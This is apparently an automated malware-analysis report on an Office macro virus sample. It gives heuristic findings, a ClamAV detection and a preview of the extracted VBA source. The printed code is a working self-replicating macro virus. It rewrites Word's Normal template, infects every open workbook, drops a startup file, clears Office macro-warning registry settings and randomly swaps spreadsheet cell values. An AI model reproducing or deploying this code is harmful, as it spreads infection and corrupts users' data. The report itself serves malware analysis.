Malware Insights
The sample contains VBA macros, specifically a Workbook_Open macro, which is a common technique for initial execution. The script attempts to disable antivirus by modifying registry keys related to Excel, specifically writing to 'HKCU\Software\Microsoft\Office\8.0\Excel\Microsoft Excel\Options6' and 'HKLM\Software\Microsoft\Office\8.0\New User Settings\Excel\Microsoft Excel\Options6'. It also manipulates the Normal.dot template, suggesting an attempt to establish persistence or ensure continued execution. The presence of 'CreateObject' and 'GetObject' calls further indicates dynamic execution capabilities.
Heuristics 4
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Workbook_Open macro high OLE_VBA_WBOPENWorkbook_Open macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
GetObject call high OLE_VBA_GETOBJGetObject call
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 3724 bytes |
SHA-256: c527b9b862c9222265930efee784f60071a63f976134df3db253d7ea14c170a2 |
|||
|
Detection
ClamAV:
Doc.Trojan.Hopper-12
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
'<!--1nternal-->
'Cross.BadSeed v0.41 /1nternal
Private InRoutine As Boolean
Private Sub Workbook_Deactivate()
On Error Resume Next
If UCase(Dir(Application.StartupPath + "\Book1.")) <> "BOOK1" And InRoutine <> True Then
InRoutine = True
Set WordObj = GetObject(, "Word.Application")
If WordObj = "" Then
Set WordObj = CreateObject("Word.Application")
Quit = True
End If
Set NT = WordObj.NormalTemplate.VBProject.VBComponents(1).CodeModule
If NT.Lines(1, 1) <> "'<!--1nternal-->" Then
WordObj.Options.SaveNormalPrompt = False
NT.DeleteLines 1, NT.CountOfLines
NT.InsertLines 1, "Public Sub DisableAV()" + Chr(13) + Chr(10) + "System.PrivateProfileString("""", ""HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\Excel\Microsoft Excel"", ""Options6"") = """"" + Chr(13) + Chr(10) + "System.PrivateProfileString("""", ""HKEY_LOCAL_MACHINE\Software\Microsoft\Office\8.0\New User Settings\Excel\Microsoft Excel"", ""Options6"") = """"" + Chr(13) + Chr(10) + "End Sub"
WordObj.Run "Normal.ThisDocument.DisableAV"
NT.DeleteLines 1, NT.CountOfLines
NT.InsertLines 1, ThisWorkbook.VBProject.VBComponents.Item("ThisWorkbook").CodeModule.Lines(1, ThisWorkbook.VBProject.VBComponents.Item("ThisWorkbook").CodeModule.CountOfLines)
End If
Set NT = Nothing
If Quit = True Then WordObj.Application.Quit
Workbooks.Add.SaveAs FileName:=Application.StartupPath & "\Book1.", FileFormat:=xlNormal, AddToMru:=False
Workbooks("Book1.").Close SaveChanges:=True
End If
For i = 1 To Workbooks.Count
If Workbooks(i).VBProject.VBComponents.Item("ThisWorkbook").CodeModule.Lines(1, 1) <> "'<!--1nternal-->" Then
Workbooks(i).VBProject.VBComponents.Item("ThisWorkbook").CodeModule.InsertLines 1, ThisWorkbook.VBProject.VBComponents.Item("ThisWorkbook").CodeModule.Lines(1, ThisWorkbook.VBProject.VBComponents.Item("ThisWorkbook").CodeModule.CountOfLines)
End If
Next
If ActiveWorkbook.Name <> "Book1." Then
Select Case Day(Now)
Case 1 And Int((Rnd * 10) + 1) = 1
For i = 1 To 10
ActiveSheet.Cells(Int(Rnd * 100), Int(Rnd * 100)).AddComment "Cross.BadSeed v0.41"
Next
Case 10 And Int((Rnd * 3) + 1) = 1
For f = 1 To 5
CellCol = Int(Rnd * 15) + 2
For i = 1 To 30
Row1 = Int(Rnd * 200) + 10
Row2 = Int(Rnd * 200) + 10
TempVal = ActiveSheet.Cells(Row1, CellCol)
ActiveSheet.Cells(Row1, CellCol) = ActiveSheet.Cells(Row2, CellCol)
ActiveSheet.Cells(Row2, CellCol) = TempVal
Next
Next
Case 15
Author = "1nternal"
Case 20 And Int((Rnd * 5) + 1) = 1
Application.StatusBar = "Cross.BadSeed v0.41 /1nternal"
End Select
End If
End Sub
Private Sub Workbook_Open()
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.